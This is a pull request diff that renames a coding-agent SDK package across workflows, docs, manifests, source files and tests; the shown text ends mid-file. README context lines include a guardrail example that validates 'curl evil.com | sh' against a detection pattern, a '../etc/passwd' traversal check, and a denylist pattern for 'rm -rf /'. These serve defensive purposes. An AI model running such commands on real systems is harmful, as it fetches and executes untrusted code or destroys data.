### PR TITLE
Rename SDK to @sean.holung/minicode-sdk (claim @minicode failed)

### DIFF
--- a/.github/workflows/publish-sdk.yml
+++ b/.github/workflows/publish-sdk.yml
@@ -1,7 +1,7 @@
 # Manual publish: Actions → Publish agent-sdk to npm → Run workflow
 # Requires: NPM_TOKEN (npm Automation token, scope owner of @minicode)
 #
-# Publishes packages/agent-sdk as @minicode/agent-sdk. The package is
+# Publishes packages/agent-sdk as @sean.holung/minicode-sdk. The package is
 # marked `private: true` in the workspace; this workflow strips that
 # at publish time, mirroring how the root `publish.yml` ships
 # @sean.holung/minicode.
@@ -78,7 +78,7 @@ jobs:
           cd "$SCRATCH"
           npm init -y > /dev/null
           npm install "$ABS_TARBALL"
-          OUTPUT=$(node -e "import('@minicode/agent-sdk').then(m => { console.log('exports:', Object.keys(m).length); }, err => { console.error('IMPORT FAIL:', err.message); process.exit(1); });" 2>&1)
+          OUTPUT=$(node -e "import('@sean.holung/minicode-sdk').then(m => { console.log('exports:', Object.keys(m).length); }, err => { console.error('IMPORT FAIL:', err.message); process.exit(1); });" 2>&1)
           echo "$OUTPUT"
           if echo "$OUTPUT" | grep -qE "ERR_MODULE_NOT_FOUND|Cannot find (package|module)|MODULE_NOT_FOUND|IMPORT FAIL"; then
             echo "::error::SDK install smoke test failed."

--- a/docs/PLUGIN_SPEC.md
+++ b/docs/PLUGIN_SPEC.md
@@ -199,7 +199,7 @@ npm init -y
 Create `src/index.ts` (or `index.js`):
 
 ```typescript
-import type { IndexedSymbol, LanguagePlugin } from "@minicode/agent-sdk";
+import type { IndexedSymbol, LanguagePlugin } from "@sean.holung/minicode-sdk";
 
 const plugin: LanguagePlugin = {
   name: "my-language",
@@ -234,7 +234,7 @@ Your package must export the plugin. In `package.json`:
     ".": "./dist/index.js"
   },
   "peerDependencies": {
-    "@minicode/agent-sdk": "*"
+    "@sean.holung/minicode-sdk": "*"
   }
 }
 ```
@@ -307,7 +307,7 @@ It implements `resolveDependencies` using heuristic AST analysis (heritage claus
 
 ## Reference: Python Plugin
 
-The built-in Python plugin is powered by `tree-sitter-python` and lives in its own workspace package at `packages/minicode-plugin-python/`. It serves as the canonical example of how an external `minicode-plugin-*` package would be structured: it imports `LanguagePlugin` from `@minicode/agent-sdk`, declares its own native dependencies, and is bundled into minicode at publish time via `bundleDependencies`. Authors of new built-in or third-party plugins can copy this layout directly.
+The built-in Python plugin is powered by `tree-sitter-python` and lives in its own workspace package at `packages/minicode-plugin-python/`. It serves as the canonical example of how an external `minicode-plugin-*` package would be structured: it imports `LanguagePlugin` from `@sean.holung/minicode-sdk`, declares its own native dependencies, and is bundled into minicode at publish time via `bundleDependencies`. Authors of new built-in or third-party plugins can copy this layout directly.
 
 It extracts:
 

--- a/docs/SDK_SPEC.md
+++ b/docs/SDK_SPEC.md
@@ -1,6 +1,6 @@
 # Agent Runtime SDK Specification (Draft)
 
-The repo now includes an extracted workspace package at `packages/agent-sdk` that publishes to npm as `@minicode/agent-sdk` via `.github/workflows/publish-sdk.yml`. The shipped surface — `CodingAgent`, `Session`, `ToolRegistry`, the model clients, structured-output types, MCP client integration, etc. — is documented in `packages/agent-sdk/README.md`. This document remains the broader design spec for where the public API could go next (multi-package split, additional adapters, hosted variants).
+The repo now includes an extracted workspace package at `packages/agent-sdk` that publishes to npm as `@sean.holung/minicode-sdk` via `.github/workflows/publish-sdk.yml`. The shipped surface — `CodingAgent`, `Session`, `ToolRegistry`, the model clients, structured-output types, MCP client integration, etc. — is documented in `packages/agent-sdk/README.md`. This document remains the broader design spec for where the public API could go next (multi-package split, additional adapters, hosted variants).
 
 This document proposes a reusable SDK extracted from minicode's existing runtime so the CLI can become one consumer among many (CLI, web app, CI bot, IDE extension, custom agent service).
 

--- a/package-lock.json
+++ b/package-lock.json
@@ -10,7 +10,7 @@
       "bundleDependencies": [
         "@anthropic-ai/sdk",
         "@inkjs/ui",
-        "@minicode/agent-sdk",
+        "@sean.holung/minicode-sdk",
         "@modelcontextprotocol/sdk",
         "ajv",
         "dotenv",
@@ -31,8 +31,8 @@
       "dependencies": {
         "@anthropic-ai/sdk": "^0.76.0",
         "@inkjs/ui": "^2.0.0",
-        "@minicode/agent-sdk": "*",
         "@modelcontextprotocol/sdk": "^1.29.0",
+        "@sean.holung/minicode-sdk": "*",
         "ajv": "^8.18.0",
         "dotenv": "^17.3.1",
         "ink": "^6.8.0",
@@ -750,10 +750,6 @@
         "node": ">=18"
       }
     },
-    "node_modules/@minicode/agent-sdk": {
-      "resolved": "packages/agent-sdk",
-      "link": true
-    },
     "node_modules/@modelcontextprotocol/sdk": {
       "version": "1.29.0",
       "resolved": "https://registry.npmjs.org/@modelcontextprotocol/sdk/-/sdk-1.29.0.tgz",
@@ -794,6 +790,10 @@
           "optional": false
         }
       }
+    },
+    "node_modules/@sean.holung/minicode-sdk": {
+      "resolved": "packages/agent-sdk",
+      "link": true
     },
     "node_modules/@types/esrecurse": {
       "version": "4.3.1",
@@ -3829,7 +3829,7 @@
       }
     },
     "packages/agent-sdk": {
-      "name": "@minicode/agent-sdk",
+      "name": "@sean.holung/minicode-sdk",
       "version": "0.1.0",
       "dependencies": {
         "@anthropic-ai/sdk": "^0.76.0",
@@ -3853,7 +3853,7 @@
         "tree-sitter-python": "^0.25.0"
       },
       "devDependencies": {
-        "@minicode/agent-sdk": "*",
+        "@sean.holung/minicode-sdk": "*",
         "@types/node": "^25.2.3",
         "tsx": "^4.21.0",
         "typescript": "^5.9.3"
@@ -3862,7 +3862,7 @@
         "node": ">=22.0.0"
       },
       "peerDependencies": {
-        "@minicode/agent-sdk": "*"
+        "@sean.holung/minicode-sdk": "*"
       }
     }
   }

--- a/package.json
+++ b/package.json
@@ -22,7 +22,7 @@
   "bundleDependencies": [
     "@anthropic-ai/sdk",
     "@inkjs/ui",
-    "@minicode/agent-sdk",
+    "@sean.holung/minicode-sdk",
     "@modelcontextprotocol/sdk",
     "ajv",
     "dotenv",
@@ -57,7 +57,7 @@
   "dependencies": {
     "@anthropic-ai/sdk": "^0.76.0",
     "@inkjs/ui": "^2.0.0",
-    "@minicode/agent-sdk": "*",
+    "@sean.holung/minicode-sdk": "*",
     "@modelcontextprotocol/sdk": "^1.29.0",
     "ajv": "^8.18.0",
     "dotenv": "^17.3.1",

--- a/packages/agent-sdk/README.md
+++ b/packages/agent-sdk/README.md
@@ -1,11 +1,11 @@
-# @minicode/agent-sdk
+# @sean.holung/minicode-sdk
 
 Reusable agent runtime SDK extracted from minicode. Provides everything needed to build an AI coding agent: model clients, tool registry, session management, safety guardrails, and a turn-based agent loop.
 
 ## Installation
 
 ```bash
-npm install @minicode/agent-sdk
+npm install @sean.holung/minicode-sdk
 ```
 
 > **Requires:** Node.js >= 22.0.0
@@ -21,8 +21,8 @@ import {
   AnthropicModelClient,
   Session,
   buildSystemPrompt,
-} from "@minicode/agent-sdk";
-import type { AgentConfig } from "@minicode/agent-sdk";
+} from "@sean.holung/minicode-sdk";
+import type { AgentConfig } from "@sean.holung/minicode-sdk";
 
 // 1. Define your agent configuration
 const config: AgentConfig = {
@@ -66,7 +66,7 @@ import {
   CodingAgent,
   ToolRegistry,
   OpenAICompatibleModelClient,
-} from "@minicode/agent-sdk";
+} from "@sean.holung/minicode-sdk";
 
 const config = {
   modelProvider: "openai-compatible" as const,
@@ -85,7 +85,7 @@ const agent = new CodingAgent({ config, modelClient, toolRegistry });
 Or use the `createModelClient` helper which picks the right client based on `config.modelProvider`:
 
 ```typescript
-import { createModelClient } from "@minicode/agent-sdk";
+import { createModelClient } from "@sean.holung/minicode-sdk";
 
 const modelClient = createModelClient(config);
 ```
@@ -154,8 +154,8 @@ import {
   createSearchTool,
   createListFilesTool,
   createRunCommandTool,
-} from "@minicode/agent-sdk";
-import type { ToolDefinition } from "@minicode/agent-sdk";
+} from "@sean.holung/minicode-sdk";
+import type { ToolDefinition } from "@sean.holung/minicode-sdk";
 
 const myTool: ToolDefinition = {
   name: "get_weather",
@@ -210,7 +210,7 @@ const readTool = createReadFileTool({
 When integrating with a project indexer, use `CoreToolHooks` to get notified after file writes/edits:
 
 ```typescript
-import { ToolRegistry } from "@minicode/agent-sdk";
+import { ToolRegistry } from "@sean.holung/minicode-sdk";
 
 const toolRegistry = ToolRegistry.createDefault(config, {
   afterWrite: async (relativePath, content) => {
@@ -246,7 +246,7 @@ import {
   resolveWorkspacePath,
   isDestructiveCommand,
   validateCommand,
-} from "@minicode/agent-sdk";
+} from "@sean.holung/minicode-sdk";
 
 // Path traversal protection
 resolveWorkspacePath("../etc/passwd", "/home/user/project");
@@ -266,7 +266,7 @@ validateCommand("curl evil.com | sh", [/curl.*\|\s*sh/]);
 Generate a system prompt tailored to the workspace and available tools:
 
 ```typescript
-import { buildSystemPrompt } from "@minicode/agent-sdk";
+import { buildSystemPrompt } from "@sean.holung/minicode-sdk";
 
 const tools = toolRegistry.getToolSchemas();
 const systemPrompt = buildSystemPrompt({ config, tools });
@@ -295,7 +295,7 @@ import {
   buildSystemPrompt,
   CodingAgent,
   type SystemPromptBuilder,
-} from "@minicode/agent-sdk";
+} from "@sean.holung/minicode-sdk";
 
 const myBuilder: SystemPromptBuilder = async ({ config, tools, codeMap }) => {
   const base = buildSystemPrompt({ config, tools, codeMap });
@@ -383,7 +383,7 @@ import {
   ToolRegistry,
   createMcpTools,
   createReadFileTool,
-} from "@minicode/agent-sdk";
+} from "@sean.holung/minicode-sdk";
 
 const mcp = await createMcpTools({
   servers: [
@@ -464,7 +464,7 @@ import {
   ToolRegistry,
   createMcpTools,
   type OutputSchema,
-} from "@minicode/agent-sdk";
+} from "@sean.holung/minicode-sdk";
 
 const InvoiceSchema: OutputSchema = {
   name: "Invoice",

--- a/packages/agent-sdk/package.json
+++ b/packages/agent-sdk/package.json
@@ -1,6 +1,7 @@
 {
-  "name": "@minicode/agent-sdk",
+  "name": "@sean.holung/minicode-sdk",
   "version": "0.1.0",
+  "private": true,
   "description": "Reusable agent runtime SDK extracted from minicode",
   "type": "module",
   "engines": {

--- a/packages/agent-sdk/src/agent/agent.ts
+++ b/packages/agent-sdk/src/agent/agent.ts
@@ -246,7 +246,7 @@ export class CodingAgent {
      *
      * Use this to point the agent at a different domain (review bot,
      * RAG assistant, non-coding use case) without rewriting the rest
-     * of the SDK. Import `buildSystemPrompt` from `@minicode/agent-sdk`
+     * of the SDK. Import `buildSystemPrompt` from `@sean.holung/minicode-sdk`
      * and call it from your builder to extend the default rather than
      * replace it.
      */

--- a/packages/agent-sdk/src/mcp/client-registry.ts
+++ b/packages/agent-sdk/src/mcp/client-registry.ts
@@ -197,7 +197,7 @@ async function connectServer(
 ): Promise<{ name: string; client: Client }> {
   const transport = createTransport(config);
   const client = new Client(
-    { name: "@minicode/agent-sdk", version: "0.1.0" },
+    { name: "@sean.holung/minicode-sdk", version: "0.1.0" },
     { capabilities: {} },
   );
   // The MCP SDK's Transport interface uses `string` for some fields the

--- a/packages/minicode-plugin-python/package.json
+++ b/packages/minicode-plugin-python/package.json
@@ -26,10 +26,10 @@
     "tree-sitter-python": "^0.25.0"
   },
   "peerDependencies": {
-    "@minicode/agent-sdk": "*"
+    "@sean.holung/minicode-sdk": "*"
   },
   "devDependencies": {
-    "@minicode/agent-sdk": "*",
+    "@sean.holung/minicode-sdk": "*",
     "@types/node": "^25.2.3",
     "tsx": "^4.21.0",
     "typescript": "^5.9.3"

--- a/packages/minicode-plugin-python/src/index.ts
+++ b/packages/minicode-plugin-python/src/index.ts
@@ -5,7 +5,7 @@ import type {
   DependencyEdgeKind,
   IndexedSymbol,
   LanguagePlugin,
-} from "@minicode/agent-sdk";
+} from "@sean.holung/minicode-sdk";
 
 import Python from "tree-sitter-python";
 

--- a/scripts/run-benchmarks.ts
+++ b/scripts/run-benchmarks.ts
@@ -23,8 +23,8 @@ import { writeFile } from "node:fs/promises";
 
 import {
   createModelClient,
-} from "@minicode/agent-sdk";
-import type { AgentConfig } from "@minicode/agent-sdk";
+} from "@sean.holung/minicode-sdk";
+import type { AgentConfig } from "@sean.holung/minicode-sdk";
 import { parse as parseDotenv } from "dotenv";
 
 import { loadBenchmarkTasks, loadBenchmarkTask } from "../src/benchmark/task-loader.js";

--- a/scripts/verify-bundle-deps.mjs
+++ b/scripts/verify-bundle-deps.mjs
@@ -44,7 +44,7 @@ function isRelative(spec) {
  *   "react" → "react"
  *   "react/jsx-runtime" → "react"
  *   "@anthropic-ai/sdk" → "@anthropic-ai/sdk"
- *   "@minicode/agent-sdk/dist/foo.js" → "@minicode/agent-sdk"
+ *   "@sean.holung/minicode-sdk/dist/foo.js" → "@sean.holung/minicode-sdk"
  */
 function packageNameOf(spec) {
   if (spec.startsWith("@")) {

--- a/src/agent/config.ts
+++ b/src/agent/config.ts
@@ -4,7 +4,7 @@ import path from "node:path";
 import process from "node:process";
 import dotenv from "dotenv";
 
-import type { AgentConfig, ReasoningEffort } from "@minicode/agent-sdk";
+import type { AgentConfig, ReasoningEffort } from "@sean.holung/minicode-sdk";
 
 /** User-level config directory: ~/.minicode */
 export const MINICODE_HOME = path.join(os.homedir(), ".minicode");

--- a/src/agent/editable-config.ts
+++ b/src/agent/editable-config.ts
@@ -1,4 +1,4 @@
-import type { AgentConfig, ReasoningEffort } from "@minicode/agent-sdk";
+import type { AgentConfig, ReasoningEffort } from "@sean.holung/minicode-sdk";
 
 import {
   MINICODE_HOME,

--- a/src/benchmark/config.ts
+++ b/src/benchmark/config.ts
@@ -3,7 +3,7 @@ import path from "node:path";
 import process from "node:process";
 import dotenv from "dotenv";
 
-import type { AgentConfig, ReasoningEffort } from "@minicode/agent-sdk";
+import type { AgentConfig, ReasoningEffort } from "@sean.holung/minicode-sdk";
 
 const DEFAULT_COMMAND_DENYLIST: RegExp[] = [
   /\brm\s+-rf\s+\//i,

--- a/src/benchmark/runner.ts
+++ b/src/benchmark/runner.ts
@@ -14,12 +14,12 @@ import {
   CodingAgent,
   Session,
   ToolRegistry,
-} from "@minicode/agent-sdk";
+} from "@sean.holung/minicode-sdk";
 import type {
   AgentConfig,
   ModelClient,
   ToolDefinition,
-} from "@minicode/agent-sdk";
+} from "@sean.holung/minicode-sdk";
 
 import type {
   BenchmarkTask,

--- a/src/cli/benchmark-run.ts
+++ b/src/cli/benchmark-run.ts
@@ -7,7 +7,7 @@ import {
   createModelClient,
   type SessionMessage,
   type ToolCall,
-} from "@minicode/agent-sdk";
+} from "@sean.holung/minicode-sdk";
 
 import { getConfigSetupMessage } from "../agent/config.js";
 import {

--- a/src/cli/config-slash-command.ts
+++ b/src/cli/config-slash-command.ts
@@ -1,4 +1,4 @@
-import type { AgentConfig } from "@minicode/agent-sdk";
+import type { AgentConfig } from "@sean.holung/minicode-sdk";
 
 import { formatConfigForDisplay, MINICODE_HOME, resolveConfigEnv } from "../agent/config.js";
 import {

--- a/src/index.ts
+++ b/src/index.ts
@@ -3,7 +3,7 @@ import process from "node:process";
 import { writeFile } from "node:fs/promises";
 import { createInterface } from "node:readline/promises";
 
-import { CodingAgent, Session, createModelClient, type ModelClient, type ReasoningEffort } from "@minicode/agent-sdk";
+import { CodingAgent, Session, createModelClient, type ModelClient, type ReasoningEffort } from "@sean.holung/minicode-sdk";
 import { loadAgentConfig, getConfigSetupMessage } from "./agent/config.js";
 import {
   listSessions,

--- a/src/indexer/types.ts
+++ b/src/indexer/types.ts
@@ -1,5 +1,5 @@
 /**
- * Re-export all plugin/indexer types from @minicode/agent-sdk.
+ * Re-export all plugin/indexer types from @sean.holung/minicode-sdk.
  * This keeps internal imports working while the canonical definitions live in the SDK.
  */
 export type {
@@ -10,4 +10,4 @@ export type {
   LanguagePlugin,
   ProjectIndex,
   SymbolKind,
-} from "@minicode/agent-sdk";
+} from "@sean.holung/minicode-sdk";

--- a/src/model-utils.ts
+++ b/src/model-utils.ts
@@ -1,4 +1,4 @@
-import type { ModelInfo } from "@minicode/agent-sdk";
+import type { ModelInfo } from "@sean.holung/minicode-sdk";
 
 export function getModelDisplayName(model: ModelInfo): string {
   return (model.name ?? model.id).trim();

--- a/src/serve/agent-bridge.ts
+++ b/src/serve/agent-bridge.ts
@@ -1,10 +1,10 @@
-import { CodingAgent, Session, createModelClient } from "@minicode/agent-sdk";
+import { CodingAgent, Session, createModelClient } from "@sean.holung/minicode-sdk";
 import type {
   BeforeToolCallHook,
   ModelInfo,
   ToolPermissionDecision,
   UiUpdate,
-} from "@minicode/agent-sdk";
+} from "@sean.holung/minicode-sdk";
 import { randomUUID } from "node:crypto";
 import {
   type AutoAllowMode,

--- a/src/session/session-preview.ts
+++ b/src/session/session-preview.ts
@@ -1,4 +1,4 @@
-import type { SessionMessage } from "@minicode/agent-sdk";
+import type { SessionMessage } from "@sean.holung/minicode-sdk";
 
 export const DEFAULT_SESSION_PREVIEW_LIMIT = 10;
 const COMPACTION_SUMMARY_PREFIX = "[Conversation Summary";

--- a/src/session/session-store.ts
+++ b/src/session/session-store.ts
@@ -2,7 +2,7 @@ import { mkdir, readdir, readFile, unlink, writeFile } from "node:fs/promises";
 import os from "node:os";
 import path from "node:path";
 
-import { Session, type SessionSnapshot } from "@minicode/agent-sdk";
+import { Session, type SessionSnapshot } from "@sean.holung/minicode-sdk";
 
 export interface SavedSessionMeta {
   id: string;

--- a/src/tools/find-path.ts
+++ b/src/tools/find-path.ts
@@ -1,5 +1,5 @@
-import type { ToolDefinition } from "@minicode/agent-sdk";
-import { expectNonEmptyString, expectOptionalNumber } from "@minicode/agent-sdk";
+import type { ToolDefinition } from "@sean.holung/minicode-sdk";
+import { expectNonEmptyString, expectOptionalNumber } from "@sean.holung/minicode-sdk";
 import { getSymbolDisplayName } from "../indexer/symbol-names.js";
 import type { ProjectIndex } from "../indexer/types.js";
 import {

--- a/src/tools/find-references.ts
+++ b/src/tools/find-references.ts
@@ -1,5 +1,5 @@
-import type { ToolDefinition } from "@minicode/agent-sdk";
-import { expectNonEmptyString, expectOptionalNumber } from "@minicode/agent-sdk";
+import type { ToolDefinition } from "@sean.holung/minicode-sdk";
+import { expectNonEmptyString, expectOptionalNumber } from "@sean.holung/minicode-sdk";
 import { getSymbolDisplayName } from "../indexer/symbol-names.js";
 import type { ProjectIndex } from "../indexer/types.js";
 import {

--- a/src/tools/get-dependencies.ts
+++ b/src/tools/get-dependencies.ts
@@ -1,5 +1,5 @@
-import type { ToolDefinition } from "@minicode/agent-sdk";
-import { expectNonEmptyString, expectOptionalNumber } from "@minicode/agent-sdk";
+import type { ToolDefinition } from "@sean.holung/minicode-sdk";
+import { expectNonEmptyString, expectOptionalNumber } from "@sean.holung/minicode-sdk";
 import { getSymbolDisplayName } from "../indexer/symbol-names.js";
 import type { ProjectIndex } from "../indexer/types.js";
 import {

--- a/src/tools/read-symbol.ts
+++ b/src/tools/read-symbol.ts
@@ -1,12 +1,12 @@
 import { readFile, stat } from "node:fs/promises";
 
-import type { AgentConfig, ToolDefinition } from "@minicode/agent-sdk";
+import type { AgentConfig, ToolDefinition } from "@sean.holung/minicode-sdk";
 import {
   resolveWorkspacePath,
   validateFileReadSize,
   expectNonEmptyString,
   expectOptionalBoolean,
-} from "@minicode/agent-sdk";
+} from "@sean.holung/minicode-sdk";
 import { getSymbolDisplayName } from "../indexer/symbol-names.js";
 import type { ProjectIndex } from "../indexer/types.js";
 import {

--- a/src/tools/registry.ts
+++ b/src/tools/registry.ts
@@ -6,8 +6,8 @@ import {
   createSearchTool,
   createListFilesTool,
   createRunCommandTool,
-} from "@minicode/agent-sdk";
-import type { AgentConfig, ToolDefinition } from "@minicode/agent-sdk";
+} from "@sean.holung/minicode-sdk";
+import type { AgentConfig, ToolDefinition } from "@sean.holung/minicode-sdk";
 import type { ProjectIndex } from "../indexer/types.js";
 import { createFindReferencesTool } from "./find-references.js";
 import { createGetDependenciesTool } from "./get-dependencies.js";

--- a/src/tools/search-code-map.ts
+++ b/src/tools/search-code-map.ts
@@ -1,5 +1,5 @@
-import type { ToolDefinition } from "@minicode/agent-sdk";
-import { expectNonEmptyString, expectOptionalNumber } from "@minicode/agent-sdk";
+import type { ToolDefinition } from "@sean.holung/minicode-sdk";
+import { expectNonEmptyString, expectOptionalNumber } from "@sean.holung/minicode-sdk";
 import { getSymbolDisplayName, getSymbolLookupNames } from "../indexer/symbol-names.js";
 import type { ProjectIndex } from "../indexer/types.js";
 import { searchSymbols } from "../shared/symbol-search.js";

--- a/src/ui/cli-ink.ts
+++ b/src/ui/cli-ink.ts
@@ -1,7 +1,7 @@
 import process from "node:process";
 
-import { CodingAgent, Session, createModelClient } from "@minicode/agent-sdk";
-import type { UiUpdate, ReasoningEffort } from "@minicode/agent-sdk";
+import { CodingAgent, Session, createModelClient } from "@sean.holung/minicode-sdk";
+import type { UiUpdate, ReasoningEffort } from "@sean.holung/minicode-sdk";
 import { loadAgentConfig, getConfigSetupMessage } from "../agent/config.js";
 import { handleConfigSlashCommand } from "../cli/config-slash-command.js";
 import {

--- a/src/ui/permission-gate.ts
+++ b/src/ui/permission-gate.ts
@@ -1,7 +1,7 @@
 import type {
   BeforeToolCallHook,
   ToolPermissionDecision,
-} from "@minicode/agent-sdk";
+} from "@sean.holung/minicode-sdk";
 
 import { isGatedTool, shouldAutoAllow } from "../auto-allow.js";
 import type { UiStore } from "./state/ui-store.js";

--- a/tests/agent.test.ts
+++ b/tests/agent.test.ts
@@ -5,14 +5,14 @@ import { test } from "node:test";
 import {
   CodingAgent,
   ToolRegistry,
-} from "@minicode/agent-sdk";
+} from "@sean.holung/minicode-sdk";
 import type {
   ModelClient,
   ModelResponse,
   SessionMessage,
   ToolDefinition,
   ToolSchema,
-} from "@minicode/agent-sdk";
+} from "@sean.holung/minicode-sdk";
 import { buildProjectIndex } from "../src/indexer/project-index.js";
 import { createTestAgentConfig } from "./test-utils.js";
 

--- a/tests/benchmark-harness.test.ts
+++ b/tests/benchmark-harness.test.ts
@@ -10,7 +10,7 @@ import type {
   SessionMessage,
   ToolDefinition,
   ToolSchema,
-} from "@minicode/agent-sdk";
+} from "@sean.holung/minicode-sdk";
 
 import { loadBenchmarkTasks, loadBenchmarkTask } from "../src/benchmark/task-loader.js";
 import { evaluate } from "../src/benchmark/evaluator.js";

--- a/tests/benchmark-run.test.ts
+++ b/tests/benchmark-run.test.ts
@@ -8,7 +8,7 @@ import {
   parseBenchmarkRunArgs,
   summarizeBenchmarkToolUsage,
 } from "../src/cli/benchmark-run.js";
-import type { SessionMessage } from "@minicode/agent-sdk";
+import type { SessionMessage } from "@sean.holung/minicode-sdk";
 
 test("benchmark system prompt suffix clearly disables approval-seeking behavior", () => {
   const suffix = getBenchmarkSystemPromptSuffix();

--- a/tests/config-api.test.ts
+++ b/tests/config-api.test.ts
@@ -6,7 +6,7 @@ import os from "node:os";
 import path from "node:path";
 import { afterEach, test } from "node:test";
 
-import type { ModelInfo } from "@minicode/agent-sdk";
+import type { ModelInfo } from "@sean.holung/minicode-sdk";
 import { createRequestHandler } from "../src/serve/server.js";
 import { AgentBridge } from "../src/serve/agent-bridge.js";
 import { createTestAgentConfig } from "./test-utils.js";

--- a/tests/context-indicator.test.ts
+++ b/tests/context-indicator.test.ts
@@ -6,18 +6,18 @@ import { readFileSync } from "node:fs";
 import { join } from "node:path";
 import { createRequestHandler } from "../src/serve/server.js";
 import { AgentBridge } from "../src/serve/agent-bridge.js";
-import type { UiUpdate } from "@minicode/agent-sdk";
+import type { UiUpdate } from "@sean.holung/minicode-sdk";
 import type { ServerMessage } from "../src/serve/types.js";
 import {
   CodingAgent,
   ToolRegistry,
-} from "@minicode/agent-sdk";
+} from "@sean.holung/minicode-sdk";
 import type {
   ModelClient,
   ModelResponse,
   SessionMessage,
   ToolSchema,
-} from "@minicode/agent-sdk";
+} from "@sean.holung/minicode-sdk";
 import { UiStore } from "../src/ui/state/ui-store.js";
 import { createTestAgentConfig } from "./test-utils.js";
 

--- a/tests/file-tools.test.ts
+++ b/tests/file-tools.test.ts
@@ -4,7 +4,7 @@ import { tmpdir } from "node:os";
 import path from "node:path";
 import { test } from "node:test";
 
-import { createEditFileTool, createReadFileTool, createRunCommandTool, createWriteFileTool } from "@minicode/agent-sdk";
+import { createEditFileTool, createReadFileTool, createRunCommandTool, createWriteFileTool } from "@sean.holung/minicode-sdk";
 import { buildProjectIndex } from "../src/indexer/project-index.js";
 import { createToolRegistry } from "../src/tools/registry.js";
 import { createTestAgentConfig } from "./test-utils.js";

--- a/tests/focus-tracker.test.ts
+++ b/tests/focus-tracker.test.ts
@@ -1,7 +1,7 @@
 import { test } from "node:test";
 import assert from "node:assert/strict";
 
-import { FocusTracker } from "@minicode/agent-sdk";
+import { FocusTracker } from "@sean.holung/minicode-sdk";
 
 test("FocusTracker tracks added symbols", () => {
   const tracker = new FocusTracker();

--- a/tests/guardrails.test.ts
+++ b/tests/guardrails.test.ts
@@ -5,7 +5,7 @@ import {
   resolveWorkspacePath,
   validateCommand,
   validatePath,
-} from "@minicode/agent-sdk";
+} from "@sean.holung/minicode-sdk";
 
 test("validatePath allows files within workspace", () => {
   const workspaceRoot = "/tmp/workspace";

--- a/tests/model-client-openai.test.ts
+++ b/tests/model-client-openai.test.ts
@@ -4,8 +4,8 @@ import { test } from "node:test";
 import {
   OpenAICompatibleModelClient,
   createModelClient,
-} from "@minicode/agent-sdk";
-import type { AgentConfig } from "@minicode/agent-sdk";
+} from "@sean.holung/minicode-sdk";
+import type { AgentConfig } from "@sean.holung/minicode-sdk";
 import { createTestAgentConfig } from "./test-utils.js";
 
 test("openai-compatible client sends tool schemas and parses tool calls", async () => {

--- a/tests/model-selection.test.ts
+++ b/tests/model-selection.test.ts
@@ -3,8 +3,8 @@ import { test } from "node:test";
 import { createServer } from "node:http";
 import type { Server } from "node:http";
 
-import { OpenAICompatibleModelClient } from "@minicode/agent-sdk";
-import type { ModelInfo } from "@minicode/agent-sdk";
+import { OpenAICompatibleModelClient } from "@sean.holung/minicode-sdk";
+import type { ModelInfo } from "@sean.holung/minicode-sdk";
 import { createRequestHandler } from "../src/serve/server.js";
 import { AgentBridge } from "../src/serve/agent-bridge.js";
 import { createTestAgentConfig } from "./test-utils.js";

--- a/tests/model-utils.test.ts
+++ b/tests/model-utils.test.ts
@@ -1,7 +1,7 @@
 import assert from "node:assert/strict";
 import { test } from "node:test";
 
-import type { ModelInfo } from "@minicode/agent-sdk";
+import type { ModelInfo } from "@sean.holung/minicode-sdk";
 import { filterModelsByQuery, getModelDisplayName, sortModelsAlphabetically } from "../src/model-utils.js";
 
 test("sortModelsAlphabetically sorts by display name without mutating input", () => {

--- a/tests/reasoning-effort.test.ts
+++ b/tests/reasoning-effort.test.ts
@@ -5,8 +5,8 @@ import {
   OpenAICompatibleModelClient,
   CodingAgent,
   ToolRegistry,
-} from "@minicode/agent-sdk";
-import type { AgentConfig, ModelResponse, ReasoningEffort } from "@minicode/agent-sdk";
+} from "@sean.holung/minicode-sdk";
+import type { AgentConfig, ModelResponse, ReasoningEffort } from "@sean.holung/minicode-sdk";
 import { createTestAgentConfig } from "./test-utils.js";
 import { loadAgentConfig } from "../src/agent/config.js";
 

--- a/tests/serve.integration.test.ts
+++ b/tests/serve.integration.test.ts
@@ -8,7 +8,7 @@ import path from "node:path";
 import type { StructuralAnalysisReport } from "../src/analysis/structural-analysis.js";
 import { createRequestHandler, shutdownServe } from "../src/serve/server.js";
 import { AgentBridge } from "../src/serve/agent-bridge.js";
-import { Session, type UiUpdate } from "@minicode/agent-sdk";
+import { Session, type UiUpdate } from "@sean.holung/minicode-sdk";
 import type { IndexedSymbol } from "../src/indexer/types.js";
 import type { ServerMessage } from "../src/serve/types.js";
 import { DuplicateSessionLabelError } from "../src/session/session-store.js";

--- a/tests/session-store.test.ts
+++ b/tests/session-store.test.ts
@@ -4,7 +4,7 @@ import { mkdtemp, readdir, rm } from "node:fs/promises";
 import path from "node:path";
 import os from "node:os";
 
-import { Session } from "@minicode/agent-sdk";
+import { Session } from "@sean.holung/minicode-sdk";
 
 import {
   deleteSession,

--- a/tests/session.test.ts
+++ b/tests/session.test.ts
@@ -1,7 +1,7 @@
 import { test } from "node:test";
 import assert from "node:assert/strict";
 
-import { Session } from "@minicode/agent-sdk";
+import { Session } from "@sean.holung/minicode-sdk";
 
 test("session stores and returns messages", () => {
   const session = new Session("test");

--- a/tests/structural-analysis.test.ts
+++ b/tests/structural-analysis.test.ts
@@ -1,7 +1,7 @@
 import assert from "node:assert/strict";
 import { test } from "node:test";
 
-import type { DependencyEdge, IndexedSymbol } from "@minicode/agent-sdk";
+import type { DependencyEdge, IndexedSymbol } from "@sean.holung/minicode-sdk";
 import { analyzeProjectStructure } from "../src/analysis/structural-analysis.js";
 import { createProjectIndex } from "../src/indexer/project-index.js";
 

--- a/tests/system-prompt.test.ts
+++ b/tests/system-prompt.test.ts
@@ -2,8 +2,8 @@ import assert from "node:assert/strict";
 import path from "node:path";
 import { test } from "node:test";
 
-import { buildSystemPrompt } from "@minicode/agent-sdk";
-import type { AgentConfig, ToolSchema } from "@minicode/agent-sdk";
+import { buildSystemPrompt } from "@sean.holung/minicode-sdk";
+import type { AgentConfig, ToolSchema } from "@sean.holung/minicode-sdk";
 
 function createMinimalConfig(workspaceRoot: string): AgentConfig {
   return {

--- a/tests/test-utils.ts
+++ b/tests/test-utils.ts
@@ -1,4 +1,4 @@
-import type { AgentConfig } from "@minicode/agent-sdk";
+import type { AgentConfig } from "@sean.holung/minicode-sdk";
 
 export function createTestAgentConfig(workspaceRoot: string): AgentConfig {
   return {

--- a/tests/tool-registry.test.ts
+++ b/tests/tool-registry.test.ts
@@ -1,8 +1,8 @@
 import assert from "node:assert/strict";
 import { test } from "node:test";
 
-import { ToolRegistry } from "@minicode/agent-sdk";
